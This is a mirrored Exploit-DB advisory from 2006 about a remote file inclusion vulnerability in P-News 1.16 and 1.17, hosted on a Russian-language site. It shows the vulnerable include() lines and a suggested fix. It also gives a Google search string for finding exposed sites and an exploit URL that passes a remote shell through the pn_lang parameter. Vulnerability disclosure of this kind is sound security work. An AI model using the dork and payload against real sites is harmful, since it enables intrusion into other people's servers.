- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2577
- Проверка EDB
-
- Пройдено
- Автор
- VEGAS78
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5434
- Дата публикации
- 2006-10-16
Код:
============================================
P-News 1.16, 1.17 Remote File Inclusion Vulnerability
============================================
Discovered by vegas78 - feel82[at]web.de
============================================
Greetz: scoper, corny, smaesch0r, Sascha Schmalz,
ReFleCtion, BleX, |pupi (?),
============================================
include("$pn_lang/functions.php"); // bad code
include("$pn_lang/language.php"); // bad code
...
fix:
make absolute path declaration or update to the new 2.* version
// Google string
allintitle:"P-news ver. 1.16" / allinurl:p-news.php
================================================================
http://site/p-news.php?pn_lang=[shell]
================================================================
# milw0rm.com [2006-10-16]- Источник
- www.exploit-db.com
